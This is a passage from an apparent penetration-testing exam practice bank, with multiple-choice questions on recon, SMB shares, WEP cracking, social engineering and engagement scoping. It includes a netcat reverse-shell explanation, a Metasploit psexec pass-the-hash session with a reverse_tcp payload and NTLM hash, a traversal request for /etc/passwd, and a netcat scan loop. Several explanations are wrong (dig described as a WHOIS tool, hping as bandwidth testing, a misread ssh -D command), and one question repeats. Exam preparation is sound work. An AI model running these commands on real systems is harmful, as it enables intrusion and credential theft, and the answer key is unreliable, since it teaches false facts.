B.To create a reverse shell on a WIndows host
Explanation:
Nc provides the ability to execute programs upon successful connection. The nc -e cmd.exe command will execute "cmd.exe" once it is connected to the remote IP, thus serving a shell to the remote host. The fact that the command is executed on the target and then connects back to the host makes it a reverse shell.
276
George has managed to gain access to a Windows network in his client's environment. His next move is to search for hidden locations like "IPC$", "C$" and "ADMIN$" and discover their permissions in order to determine if he can write to those locations. What tool should George use to go through the above process?
A.Burp Suite active scan
B.Nmap script known as "smb-enum-shares.nse" to enumerate SMB shares in the network
C.Arpspoof tool to discover live hosts on the network
D.Wireshark to sniff the network for traffic to the above locations
B.Nmap script known as "smb-enum-shares.nse" to enumerate SMB shares in the network
Explanation:
"IPC$", "C$" and "ADMIN$" are Windows hidden shares running on port 445 as SMB service. Nmap provides a script using Nmap Scripting Engine language (NSE) that will enumerate such hidden shares on a network.
277
```
James is cracking a WEP Wi-Fi password. He is looking for a way to speed up the cracking process. Which of the following might help?
A.Attacking the access point directly
B.A fragmentation attack
C.Creating a rogue Wi-Fi
D.Running more than one cracking machine
```
B.A fragmentation attack
Explanation:
A way to accomplish WEP key recovery when there are no clients on the network is by executing a fragmentation attack, which is very similar to the ChopChop attack. This type of attack will speed up the cracking process by injecting arbitrary packets into the wireless access point, but it does not actually crack the key.
278
Why do penetration testers usually end up conducting dynamic code analysis rather than static code analysis?
A.Because static analysis might produce false-positive results
B.Because dynamic analysis is faster
C.Because pentesters are rarely provided with the source code
D.Because pentesters do not have the tools for static analysis
C.Because pentesters are rarely provided with the source code
Explanation:
Penetration testers are much more likely to find themselves able to conduct dynamic analysis of code rather than static analysis because the terms of penetration-testing SOWs often restrict access to source code.
279
```
Alex is doing DNS enumeration and would like to obtain the IP address behind the company domain: example.com. Which command would resolve the IP?
A.ip example.com
B.whois.example.com
C.nslookup example.com
D.resolve example.com
```
C.nslookup example.com
Explanation:
nslookup is an integrated tool on both Linux and Windows machines. It can be used to interrogate DNS servers.
280
```
Which of the following subjects is not typically part of the Statement of Work (SOW)?
A.Scope of work
B.Location of work
C.Payment Schedule
D.Non-disclosure agreement
```
D.Non-disclosure agreement
Explanation:
A Statement of Work (SOW) is a key document for your pentesting project.
If you are at the stage of executing an SOW, it should mean that you have completed your vetting process and will be locking i your penetration testing vendor
Key Items in a pentest DOE:
- Scope
- Deliverable
- Price
- Completion date
- Location of work
- Payment Schedule
A non-disclosure agreement (NDA) is typically a separate document and only covers the confidentiality of the information owned by the organization
281
```
If John has been given the source code of a target, what can he do to fully understand it?
A.Reverse-engineer it
B,Debug it
C.Run it
D.none of the above
```
B,Debug it
Explanation:
Debugging is the process of running software line by line slowly to fully understand what is happening
Running it could not give detailed information about what is happening on a deep level
Reverse engineering it is useless when you have the source code
282
Why is it important to review the "robots.txt" file when conducting a web application penetration test?
A.Robots.txt is a text file with site automation instructions which can help determine the website logic
B.Robots.txt is a text file that servers as the database configuration file
C.RObots.txt is a list of web server locations that should not be crawled by search engines
D.Robots.txt is a text file that contains the full directory listing of the server
C.RObots.txt is a list of web server locations that should not be crawled by search engines
Explanation:
When a legitimate search engine is crawling a website in order to index its pages and links, it will read the robots.txt file and follow the instructions from it. This file usually contains the path to the "admin login page" or other resources that should not necessarily be presented in the search results. Malicious search engines or automated crawlers ignore the robots.txt file.
283
Who should be signing the contractual agreement between two entities defining a pentest engagement?
A.Client's CEO
B.Project managers from both sites
C.Appropriate signing authority from the client site
D.Client's security officer
C.Appropriate signing authority from the client site
Explanation:
Contracts are mutual agreements that are enforceable by law and require an authorized representative from each party (ie contract signing authority) to sign the contract
284
James is in the middle of a pentest engagement when one of the hosts he is testing suddenly goes offline. What can James do to remediate the issue?
A.Look for support contacts on the official client website
B.Note the issue in the report and keep testing other targets
C.Contact the appropriate support based on the predefined escalation path
D.Call the client CEO to inform them of the issue
C.Contact the appropriate support based on the predefined escalation path
Explanation:
The escalation path is a pre-engagement document to be used in case an issue arises during the engagement. This escalation path usually contains contact details for appropriate support teams.
285
In a goal-based engagement, George is tasked with gaining access to a Linux machine through a graphical user interface. He manages to connect over SSH with a user account and notices that x-forwarding is disabled. A quick port scan shows a service running on port 5900/TCP. When he tries to connect, he is prompted for a password. What can George do?
A.Look for the VNC password in the $HOME/.vnc/passwd file
B.Try kernel exploits for privilege escalation and reconfigure SSH with x-forwarding on
C.Use the same credentials from the SSH session over VNC
D.Look for the VNC password in the /etc/passwd file
A.Look for the VNC password in the $HOME/.vnc/passwd file
Explanation:
The VNC password is stored in the user’s home directory ($HOME/.vnc/passwd) for Mac and Linux operating systems (in Windows, the password is stored either in an .ini file or in the registry) and is in DES format.
286
George is at the login page of the admin panel of the targeted web application. He notices that there is no limit on login attempts and is building a dictionary with users and passwords. His next step is to run a tool that will automatically test these credentials against the login page. What exploitation method is he using?
A.HTTP PAramter pollution
B.Credential brute-forcing
C.Pass the hash
D.SQL Injection
B.Credential brute-forcing
Explanation:
During a pentest engagement, you are likely to come across application servers that allow users to authenticate access via username and password. These types of forms are typically the target of brute-force login attacks. CeWL is a Ruby application that spiders a given URL and returns a wordlist that can be used for either password crackers (like John the Ripper) or brute-force login tools (like Hydra).
287
George is running "wash -i wlan1mon" on his Kali machine. What is he attempting with this command?
A.He is looking for WPS-enabled networks
B.He is setting up a wlan1mon interface
C.He is sniffing traffic on the wlan1mon interface
D.He is brute-forcing the WiFi password on the wlan1mon network
A.He is looking for WPS-enabled networks
Explanation:
In Kali, you can use a tool called "wash" to identify all WPS-enabled networks. The list of WPS-enabled networks could also be used in an automated attack using "reaver".
288
Which open-source vulnerability scanning tool is similar to Nessus and uses open-source plugins developed in NASL?
A.Acunetix
B.OpenVAS
C.Burp
D.WPscan
B.OpenVAS
Explanation:
OpenVAS is a software framework of several services and tools offering vulnerability scanning and vulnerability management. All OpenVAS products are free software, and most components are licensed under the GNU General Public License. Plugins for OpenVAS are written in the Nessus Attack Scripting Language, NASL.
289
George notices that his client uses SSL encryption for the login page of the web app, but upon detailed review of the web app database, he sees that passwords are stored in clear text. What should he recommend to his client?
A.Separate the database from the web application server (two different machine)
B.Implement salted encryption on the database
C.Move the authentication mechanism to a different port on the server
D.Implement two-factor authentication
B.Implement salted encryption on the database
Explanation:
Encrypting data in rest is as important as encrypting data in transit. They should implement salted encryption on the database. A user password stolen from a website’s password file might be the same password that protects sensitive information stored in the user’s email account. The solution to this issue is to always store passwords in encrypted or hashed form. This prevents an attacker who gains access to the server from easily accessing all of the passwords stored on that server.
290
George is preparing an Nmap scan. He needs the results to be both in XML (so he can import them in another tool) and in grepable format (so he can quickly walk through the results using grep and focus on specific services). Which flag in Nmap could produce the final results in both XML and grepable format?
A.--destination=xml,grep
B.--output=xml,grep
C.-oA
D.-oX
C.-oA
Explanation:
Nmap can produce reports in a few different outputs, but sometimes you need more than one at the same time. Instead of conducting the same scan twice to get the desired output, George could use -oA to output the results into all available formats.
291
Nathan wants to enumerate SMB shares and their access levels on the target host. Which tool can help him?
A.Dig
B.hping
C.rpcclient
D.SMBMap
D.SMBMap
Explanation:
This tool is built into Kali Linux and enumerates shares and access levels.
hping is bandwidth testing software. Dig is a tool for accessing WHOIS records. rpcclient is a tool for running remote procedures over remote procedure call (RPC) service.
292
```
What would James need to acquire in order to conduct a successful pass-the-hash replay attack?
A.Username hashes
B.MySQL Hashes
C.Rainbow tables
D.NTLM Hashes
```
D.NTLM Hashes
Explanation:
One of the most common replay attacks used by pentesters is an NTLM pass-the-hash attack. Once the NTLM hashes are acquired, pentesters can identify systems that do not need SMB signing. When targets are selected, the attack can be carried out with the help of an NTLM relay tool.
293
Given the command excerpt below, what type of attack is being carried out?
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.57.133
LHOST => 192.168.57.133
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST 192.168.57.131
RHOST => 192.168.57.131
msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit
A.Man-in-the-middle attacl
B.Pass-the-hash attack
C.User enumeration using SMB
D.Remote code execution
B.Pass-the-hash attack
Explanation:
Pass-the-hash attacks rely on injecting hashes into LSASS, or presenting NTLM hashes to services like SMB or WMI. This is made easier by the fact that the Sysinternals PsExec tool can directly accept an NTLM hash as an argument instead of a password.
294
What method is used to objectively identify, quantify and address the risk associated with an organization's IT infrastructure?
A.Threat modeling
B.Read teaming
C.Asset management
D.Vulnerability scanning
A.Threat modeling
Explanation:
Threat modeling is a complex process that takes a structured approach to identify, quantify, and address the risks associated with an organization’s information system. It involves activities such as identifying assets, getting an overview of the architecture, decomposing the application, and identifying the threats.
295
James is in proximity of the client's office. He is getting a perfect Wi-Fi signal from the office access point (AP). He needs to trick the client into sharing their RADIUS login credentials. Which tool could he use?
A.Evil Twin
B.Nikto
C.hping
D.Metasploit
A.Evil Twin
Explanation:
One way to trick the client into sharing their RADIUS login credentials is to act as a fraudulent Wi-Fi access point, otherwise known as the Evil Twin. HostAP (in Kali Linux: apt-get install hostapd) is a popular access point software that can be run from a computer operating system such as Kali Linux. It allows the host to perform all functions of a typical wireless router. For WPA and WPA2 enterprise networks, HostAP provides support for RADIUS authentication and supports the ability to carry out impersonation attacks against wireless clients.
296
In Windows systems, host name resolution generally uses the following sequence:
A.1.NetBIOS name resolution sequence, 2.Search local Hosts file, 3.DNS servers queried,4.Check if name queried
B.1.DNS servers queried,2.NetBIOS name resolution sequence,3.Search local Hosts file,4.Check if name queried
C.WIndows uses only DNS servers for hostname resolution
D.1.Check if name queried,2.Search local host files,3.DNS servers queried,4.NetBIOS name resolution
D.1.Check if name queried,2.Search local host files,3.DNS servers queried,4.NetBIOS name resolution
Explanation:Correct answer: 1. Check if name queried, 2. Search local Hosts file, 3. DNS servers queried, 4. NetBIOS name resolution sequence
In Windows systems, host name resolution generally uses the following sequence:
The client checks to see if the name queried is its own.
The client then searches a local Hosts file, a list of IP address and names stored on the local computer.
Domain Name System (DNS) servers are queried.
If the name is still not resolved, NetBIOS name resolution sequence is used as a backup. This order can be changed by configuring the NetBIOS node type of the client.
297
```
John is doing a pentest. In his passive information-gathering phase, he sees exposed electronic documents. What tool can he use to extract useful metadata information about the documents he found?
A.ExifTOol
B.Maltego
C.CherryTree
D.Ghidra
```
A.ExifTOol
Explanation:
ExifTool is software that displays metadata from different kinds of files (img, txt, etc.).
Ghidra is a tool for reverse engineering.
CherryTree is a tool for note-taking.
Maltego is a tool for passive or active information-gathering.
298
What sort of vulnerability would allow an attacker to navigate the directory structure of a server using HTTP requests and retrieve the contents of a file such as /etc/passwd. For example:
GET http://target.net/article&id=../../../../etc/passwd
A.Directory traversal
B.SQL Injection
C.Remote File Inclusion
D.Local File Inclusion
A.Directory traversal
Explanation:
Some web servers suffer from a security misconfiguration that allows users to navigate the directory structure and access files that should remain secure. These directory traversal attacks work when web servers allow the inclusion of operators that navigate directory paths and file system access controls don’t properly restrict access to files stored elsewhere on the server.
299
```
What sort of scan is used in the following scenario: a network scan that detects connected systems and is used to build a list of targets or an asset inventory list.
A.Compliance Scan
B.Port Scan
C.Stealth Scan
D.Discovery Scan
```
D.Discovery Scan
Explanation:
A discovery scan is used usually in the beginning of testing in order to build a list of targets, similar to an asset inventory list.
300
Which description best matches the “USB key drop” hacking technique?
A.Using an external USB antenna to connect to the target network
B.Downloading sensitive data onto a USB drive
C.Collecting unattended or misplaced USB drives from the organizations office
D.Preloading hacking tools on a USB drive and leaving it with an interesting label at the organizations office
D.Preloading hacking tools on a USB drive and leaving it with an interesting label at the organizations office
Explanation:
The USB key drop technique is done by preloading hacking tools aimed against the targeted OS on a USB thumb drive and then leaving it with an interesting label somewhere in the organization's office. This method is usually a last resort, used when everything else fails.
301
```
Which attack technique could be applicable in a web application pentest?
A.ARP Spoofing
B.Kernel exploit
C.Bluejacking
D.Reflected HTML Injection
```
D.Reflected HTML Injection
Explanation:
A reflected HTML injection vulnerability is a nonpersistent browser execution attack, meaning that the injection would be lost once the current browser session was closed.
302
Consider the following output:
Share name Resource Remark
-------------------------------------------------------------------------------
ADMIN$ C:\Windows Remote Admin
C$ C:\ Default share
D$ D:\ Default share
E$ E:\ Default share
F$ F:\ Default share
G$ G:\ Default share
K$ K:\ Default share
IPC$ Remote IPC
N$ N:\ Default share
The command completed successfully.
What command was used to produce this output and what does it show us?
A.The command is "net session" and the output shows current SMB shares on remote hosts
B.The command is "net share" and the output shows current SMB shares on a local host
C.The command is "smb list" and the output shows all SMB shares on a local host
D.The command is "rpcclient --list" and the output shows all SMB shares on a remote host
B.The command is "net share" and the output shows current SMB shares on a local host
Explanation:
The "net" command in Windows is very powerful. You can use net view \\ to discover available Windows shared drives or showmount -e for NFS shares.
303
```
Alex is looking for any additional information about the application she is testing. Where could she find it?
A.NDA documentation
B.RoE documentation
C.WSDL and SDK documentation
D.SOW documentation
```
C.WSDL and SDK documentation
Explanation:
Alex could look for exposed web services through Web Services Description Language (WSDL) documents and software development kit (SDK) documentation. Those documents are usually associated with the developing of an application and would contain useful information provided by the developers.
304
You are tasked with helping an organization with threat modeling before a pentest. Your client shares that their most valuable asset is the information they have and the extensive R&D they have invested in. It worries them that data could easily be exfiltrated by almost anyone in the organization. What sort of threat actor are they mostly concerned about?
A.Script kiddies
B.Insider threat
C.Red team attack
D.Social engineering attacker
B.Insider threat
Explanation:
Insider threat is usually related to information exfiltration. It is fairly easy to copy sensitive internal information to a thumb drive and take it off the premises.
305
You are running a vulnerability scan using QualysGuard and your scanning time matches the working hours of the targeted sector. You have been asked to limit the impact of the scan to not to consume so much bandwidth in order to minimize impact on the company's work. What could you do to lower the impact and still perform the scan?
A.Setup the scanning parameters for "Port Scanning and Host Discovery" intensity to "Low"
B.You shouldnt be concerned with the comapnys work impact and you should run the scan with default setup
C.Throttle QualysGuard scanner connection to limit its bandwidth
D.Put up a firewall that would limit the scanning impact
A.Setup the scanning parameters for "Port Scanning and Host Discovery" intensity to "Low"
Explanation:
QualysGuard is a web-based UI which offers network discovery and mapping, asset prioritization, vulnerability assessment reporting and remediation tracking according to business risk. Most massive scanners, especially the commercial ones, offer fine-tuning of the scan configuration. You could dive deep in the scanner configuration and limit it in a way that it would not impact the company's bandwidth.
306
Since detection is not a concern, which method of persistence would you choose when exploiting a Linux machine?
A.Create a daemon with the malware
B.Use code injection and inject it into as service
C.Edit the boot loader to load the malware
D.Use DLL injection
A.Create a daemon with the malware
Explanation:
Daemons are programs that run in the background and not under the control of the user. Think of daemons like services in Windows.
Code injection would require much more effort and would only benefit if the goal was to hide the attack.
DLLs are used in Windows operating systems only.
Editing the boot loader would require high privileges and much more effort in comparison to creating a daemon.
307
Which of the following Nmap scan methods should you use if you know that there is a stateless firewall between you and the targeted host?
A.TCP ACK (-sA)
B.-A
C.TCP SYN (-sS)
D.-Pn (no ping scan)
A.TCP ACK (-sA)
Explanation:
When performing port scanning, there is always the possibility to hit a firewall. The stateless firewall would not keep track of the connections state; when it detects an "ACK" packet it would consider it part of an active connection and pass it through. The same logic applies for "FIN" packets.
308
George is writing a pentest report. He has found a vulnerability that would require a short Python code to be exploited. What is that short Python script called?
A.Trojan horse
B.Malware
C.POC (Proof of Concept)
D.API (Application Program Interface)
C.POC (Proof of Concept)
Explanation:
A proof of concept is exactly what it sounds like: some sort of proof that the vulnerability found could be exploited. This is usually a short code in the form of a script that could be used to exploit it. You may need a compiler to compile proof-of-concept source code for a given operating system, or to modify an exploit to account for certain environmental conditions like firewalls and proxy servers.
309
When contracting an external company to perform a penetration test, what document would you need to have signed in order to guarantee the confidentiality of the organization's internal information?
A.NDA
B.MSA
C.SOW
D.RoE
A.NDA
Explanation:
A non-disclosure agreement (NDA) is protecting the business's competitive advantages from being disclosed to third parties. In the event the organization is compromised, the vendor is obligated to maintain the secrecy of the privileged information it might obtain during the pentest.
310
Similar to RDP and VNC services on Windows, Linux and MAC, Apple Remote Desktop is a remote managing software. Which port does it usually listen to?
A.5900/tcp
B.22/tcp
C.3283/tcp
D.3389/tcp
C.3283/tcp
Explanation:
Port 5900/tcp is usually associated with VNC service.
Port 3389/tcp is reserved for Windows Remote Desktop service.
Port 22/tcp is the standard SSH port.
311
George arrives early in the morning at his client's office. He is attempting to gain physical access to the building by mixing with the crowd in the morning. One of the employees enters and George follows him with the words "Sorry, I'm new here and forgot my badge."
What technique is George using?
A.Elicitation
B.Tailgating
C.Dumpster Diving
D.Piggybacking
D.Piggybacking
Explanation:
Piggybacking is a type of social engineering technique that can be used to exploit physical access controls in order to gain unauthorized access to a restricted area. This is accomplished by an unauthorized person walking in through the door behind an authorized employee with legitimate access who consents to the access. A social-engineered response might sound something like, “Sorry about that, I'm new here and left my badge at my desk."
312
Larry is an attacker whose arsenal consists mainly of open-source tools and scripts found online. What kind of attacker is Larry considered?
A.Black hat hacker
B.Script kiddie
C.APT
D.Hacktivist
B.Script kiddie
Explanation:
In programming and hacking cultures, a script kiddie, skiddie, or skid is an unskilled individual who uses scripts or programs developed by others to attack computer systems, networks, and websites. They rely heavily on open-source tools and scripts.
Hacktivism (the individual is known as a hacktivist) is the use of computer-based techniques such as hacking as a form of civil disobedience to promote a political agenda or social change.
An advanced persistent threat (APT) is a stealthy computer network threat actor which gains unauthorized access to a computer network and remains undetected for an extended period.
A black hat hacker is a hacker who violates computer security for personal gain or maliciousness.
313
```
John has gathered as much information as possible about the target from open sources; now, how can he enumerate services?
A.Using theHarvester
B.Escalating the information from OSINT
C.Using WHOIS service
D.Using port scanners
```
D.Using port scanners
Explanation:
Ports scanners are tools that send traffic to specific ports and can enumerate services based on the server response.
OSINT information cannot be escalated in order to enumerate services, but it can be useful for gathering IP ranges.
WHOIS does not provide service information.
theHarvester is an OSINT email and social scanning tool.
314
```
Which of the following is a tool used for establishing persistence?
A.Empire
B.Hydra
C.Burp
D.Nessus
```
A.Empire
Explanation:
Empire is a PowerShell tool used in the post-exploitation stage. It offers functionality to establish persistence as well as lateral movement.
315
```
George has found an AP with WEP authentication. He is injecting arbitrary packets into the traffic stream and then using that traffic to more quickly extract the WEP key. What attack is George using?
A.Fragmentation attack
B.Downgrade attack
C.ARP spoofing
D.DNS Cache Poisoning
```
A.Fragmentation attack
Explanation:
Fragmentation attacks are not very useful in modern networks. When WEP (Wired Equivalent Privacy) was commonly used to protect wireless traffic, fragmentation attacks were used to speed up the cracking process by injecting arbitrary packets into the traffic stream and then using that traffic to more quickly extract the WEP key. You’re very unlikely to run into a need to conduct one on a modern network.
316
During the enumeration phase of a pentest, Alex is examining the SSL certificate of a web app found in the client environment. What useful information could he possibly find in the certificate?
A.There is no useful information in the certificate
B.Encrypted password hashes
C.The administrator account of the host
D.The issuer and expiration date
D.The issuer and expiration date
Explanation:
By examining the certificate, Alex could find some useful details to aid in his penetration testing, such as other domains under the certificate, the issuer, the expiration date, and so on.
317
George is tasked with a pentest. One of his objectives is to attack the company supply chain. During the OSINT phase, George is able to identify third-party resources involved in the supply chain. Those resources are not listed in his scope of testing, but they are part of the supply chain and therefore part of his objectives. How should George handle the third-party resources?
A.He should test the third-party resources as long as the tests are not intrusive
B.If the supply chain is in the objectives, then George should test everything related to it
C.He should only test in-scope resources and completely exclude any other assets from testing
D. He should contact his client and ask for permission to test the third-party resources
C.He should only test in-scope resources and completely exclude any other assets from testing
Explanation:
Third-party assets or resources are owned by another company. Unless explicitly approved by that company, George should not attack them. There needs to be a written statement from the third party that such tests are approved.
318
One of the common vulnerabilities found in insecure code is:
A.List of vulnerabilities
B.List of all hosts using the current software
C.Hard-coded credentials
D.Software developer personal data
C.Hard-coded credentials
Explanation:
It is amazing how often you can find hard-coded credentials in the source code of an application. Insecure code practices is a whole segment of penetration testing and covers all sorts of similar developers' mistakes.
319
```
What type of attack could be carried out if you managed to get the cookie from the site administrator's current session?
A.Credentials harvesting
B.Impersonation
C.Brute-force
D.Session hijacking
```
D.Session hijacking
Explanation:
Web sessions are designed to accompany the user’s interaction with the web framework. A unique session identifier is generated by the web server or web application and lasts for the duration of the user’s visit. A session ID (or token) can be stored locally on the user’s hard drive as a cookie, form field, or URL.
320
```
What port range includes ports known as "registered ports" that are assigned by IANA when requested?
A.0-1023
B.0-1024
C.5000-50000
D.1024-49151
```
D.1024-49151
Explanation:
Ports ranging from 1024 to 49151 are registered ports and are assigned by IANA when requested. Many are also used arbitrarily for services.
321
Alex is attempting to gather meaningful information from a target using the elicitation method. What would greatly improve her chances?
A.A password cracking tool like Hashcat
B.A full DNS record of the comapnys domain
C.An NDA document signed by the company
D.A compromised business email
D.A compromised business email
Explanation:
A compromised business email could be used to aid in elicitation, because it provides an automatic level of trust for many targets. For example, if a phishing email was sent from a legitimate email address in the organization, it would likely pass through the spam filters and as a result would likely be trusted by more victims.
322
George is running "wash -i wlan1mon" on his Kali machine. What is he attempting with this command?
A.He is looking for a WPS-enabled networks
B.He is setting up a wlan1mon interface
C.He is sniffing traffic on the wlan1mon interface
D.He is brute-forcing the Wi-Fi password on the wlan1mon network
A.He is looking for a WPS-enabled networks
Explanation:
In Kali, you can use a tool called "wash" to identify all WPS-enabled networks. The list of WPS-enabled networks could also be used in an automated attack using "reaver".
323
Richard is in the process of mining data for a pentest he is being tasked with. What tool could he use to aid in his data mining activity?
A.OWASP ZAP Tool
B.OSINT Framework
C.MITRE CWE Database
D.NEssus
B.OSINT Framework
Explanation:
OSINT Framework is a cybersecurity framework; a collection of OSINT tools to make your intel and data collection tasks easier. This tool is mostly used by security researchers and penetration testers for digital footprinting, OSINT research, intelligence gathering, and reconnaissance.
OWASP ZAP is an open-source web application security scanner. Nessus is a proprietary vulnerability scanner. The Common Weakness Enumeration (CWE) is a category system for software weaknesses and vulnerabilities.
324
During a pentest discussion, it becomes clear that the client wants to specifically test if the penetration tester could gain access to one particular domain controller. What type of assessment does this client want?
A.Compliance-based assessment
B.Red team assessment
C.THe client wants to perform all of these assessments
D.Goal-based assessment
D.Goal-based assessment
Explanation:
Goal-based or objective-based assessments usually provide general instruction for a given scenario. For example, obtain administrative access from a specific server.
Compliance-based assessments audit an organization’s ability to follow and implement a given set of security standards within an environment. Red team assessment, or red teaming, will evaluate how well an organization would fare given a scenario of a real-world attack.
325
```
When preparing for a pentest, one of the main aspects that needs to be well documented is the purpose of the test. In which document is the test's purpose defined?
A.Statement of work
B.Rules of engagement
C.Master Service agreement
D.Nondisclosure agreement
```
A.Statement of work
Explanation:
The statement of work (SOW) usually contains the following main topics:
Purpose
Scope of work
Location of work
Period of performance
Deliverable schedule
Applicable industry standards
Acceptance criteria
Special requirements
Payment schedule
326
What remediation would help in the following situation: An attacker uses fraudulent emails to request a wire transfer.
A.Implementation of a new process
B.Setup of new spam filters
C.Implementation of new firewall rules
D.Encryption of data in transit
A.Implementation of a new process
Explanation:
The client might implement a new process that lays out specific approved techniques for requesting wire transfers, thus removing ambiguity.
327
When targeting the supply chain of a client, what needs to be considered before engaging in attacks?
A.Only in read team engagement is the supply chain tested
B.The supply chain could be global and involves other countries
C.There could be third party-providers involved
D.The supply chain could be behind a firewall
C.There could be third party-providers involved
Explanation:
The supply chain may include parties outside of the target organization’s control. During the scoping process, ensure that you know who all the players are going to be, and define authorized boundaries for the pentest.
328
```
During a web application penetration test, you are examining the http headers in the response. What could help you with this task?
A.ExifTool
B.grep
C.Nikto
D.hping
```
C.Nikto
Explanation:
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated. Nikto is not designed as a stealthy tool. It will test a web server in the quickest time possible, and is obvious in log files or to an IPS/IDS.
Grep is a command-line utility for searching plain-text data sets for lines that match a regular expression. Its name comes from the ed command g/re/p, which has the same effect: doing a global search with the regular expression and printing all matching lines.
Hping is a free packet generator and analyzer for the TCP/IP protocol.
ExifTool is a free and open-source software program for reading, writing, and manipulating image, audio, video, and PDF metadata. It is platform independent, available as both a Perl library and command-line application.
329
```
Scheduling and timelines are usually determined and detailed in which of the following?
A.The pentest report
B.Rules of engagement (RoE)
C.The pentest offer
D.The pentest scope
```
D.The pentest scope
Explanation:
The pentest scope usually includes the following:
Testing requirements
Target selection
Scheduling and timelines
Strategy for testing
330
Nathan wants to enumerate users over SNMP service. What tool can he use to to do this?
A.Burp Suite
B.snmpwalk
C.theHarvester
D.hping3
B.snmpwalk
Explanation:
snmpwalk supports SNMP enumeration, including for users.
hping3 is tool for bandwidth testing. Burp Suite is a web app scanner tool. TheHarvester is an OSINT tool for emails and other information.
331
Nathan wants to crawl a specific website in order to obtain more information about it. What tool can help him?
A.Burp Suite
B.SQLmap
C,Crunch
D.CeWL
A.Burp Suite
Explanation:
Burp Suite is proxy software, and one of its functionalities is crawling.
CeWL and Crunch are both tools for word list generation. Sqlmap is for automation of SQL injection.
332
What is the purpose of the following command:
ssh -D 8080 user@intranetserver -p 443
A.This will create a proxy connection
B.This will create a remote shell
C.This will create a reverse shell
D.THis will start DNS spoofing
A.This will create a proxy connection
Explanation:
The "ssh -D 8080 user@intranetserver -p 443" command will create a connection to "intranetserver" over SSH and push all https traffic on port 443 through the SSH connection locally on the source on port 8080. Basically, it will proxy https traffic through "intranetserver" to localhost on port 8080.
333
```
What kind of attack is SYN flood?
A.Cross-Site Request Forgery (CSRF)
B.Cross-Site Scripting (XSS)
C.Vulnerability scan using SYN packets
D.Denial of Service (DoS)
```
D.Denial of Service (DoS)
Explanation:
A SYN flood is a form of denial-of-service (DoS) attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic. A DoS attack is when the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet.
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request.
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
334
Why would George consider analyzing the code's comments in a white box pentest he is performing?
A.He is gathering data in order to build a dictionary
B.He is looking for insecure code practices
C.He is gathering info for a social engineering attack
D.Comments list all known vulnerabilities
B.He is looking for insecure code practices
Explanation:
Insecure code practices are very common. George is quite likely to find a username and password listed in the comments that were forgotten by the developers.
335
You are looking for a small lightweight tool that you can copy over a compromised machine and use it to scan the internal network. What would you pick?
A.OpenVAS
B.DirB
C.Netcat
D.Nessus
C.Netcat
Explanation:
Netcat (NC) is a computer networking utility for reading from and writing to network connections using TCP or UDP. The command is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts. NC could be used for information gathering, scanning, and exploitation. Because of the various applications of NC, it is a preferred choice. You can easily deploy NC on the compromised machine with a wget command.
Once on the machine, scanning the internal network is as simple as the following for loop:
for i in {1..254}; do nc -v -n -z -w 1 192.168.0.$i 443; done
The above command line will scan all hosts between 192.168.0.1 and 192.168.0.254 for open port 443. With -z you specify to NC that it should only scan for listeners on the specified port, but not send any data. The "-n" means it will not attempt DNS resolution and "-w 1" is a wait time of 1 second.
OpenVas is a full blown vulnerability scanner, the same is Nessus.
DirB is not a tool for network mapping.
336
John is engaging in a black box penetration test; which of the following he can recon passively?
A.Running services
B.Infrastructure, domains, IP ranges and routes for the organization
C.Vulnerabilities
D.Open Ports
B.Infrastructure, domains, IP ranges and routes for the organization
Explanation:
Correct answer: Infrastructure, domains, IP ranges and routes for the organization
Infrastructural recon is a part of the passive information-gathering process.
Opened ports and running services are discovered by active scanning.
Vulnerabilities are discovered by active scanning or manual validation (which is also active).
337
Alex is preparing the concluding report of a pentest. She needs to evaluate the risk and share the results with the customer. What are the two main factors when calculating risk?
A.Complexity and automation
B.Available exploits and OS
C.Difficulty and impact
D.Probability and damage potential
D.Probability and damage potential
Explanation:
Basic risk calculation is made with the following formula: Risk = Probability * Damage Potential
A more complex risk scoring system could be used, for example CVSSv3, where more factors are taken into consideration.
338
Where would James look to find out how long he should keep the pentest report before disposing of it?
A.NDA
B.RoE
C.Pentest proposal
D.Meeting minutes from the clients meetings
B.RoE
Explanation:
The storage time for the report is included in the terms outlined in the RoE (rules of engagement). Once the findings have been retested and the customer is satisfied with the results, the remaining copies of the report can be properly disposed of.
339
Consider the following code in Python:
for I in list:
print i
What object is "list"?
A.Its a Python array
B.It is a file
C.It is a Python function
D.It is a python operator
A.Its a Python array
Explanation:
In the given example, "list" is likely an array of variables or strings. This Python code is a standard example of iteration.
340
Jack is performing an on-site penetration test. He is in an office with other employees while they work. He is pretending to be analyzing some data, but in fact he is watching the person in front of him type in a password, which Jack will attempt to record. What technique is Jack using?
A.Password spraying
B.Shoulder surfing
C.Dumpster diving
D.Impersonation
B.Shoulder surfing
Explanation:
Shoulder surfing is the technique in which you pretend to be doing something else when in fact you are trying to see the password that someone near you is typing.
341
Robert is using Meterpreter on a hacked machine. He is planning to use Mimikatz from within Meterpreter to get some passwords. Before using Mimikatz, he is preparing to migrate to another process in memory and is targeting a 64-bit process. Why is it important in this situation to migrate on a 64-bit process?
A.If Mimikatz is ran within the memory space of a 32-bit process, it will take a longer time to complete
B.Meterpreter can only injection into 64-bit processes
C.Mimikatz uses some 64-bit processes during the credentials extraction
D.Meterpreter needs a 64-bit process to call Mimikatz from
C.Mimikatz uses some 64-bit processes during the credentials extraction
Explanation:
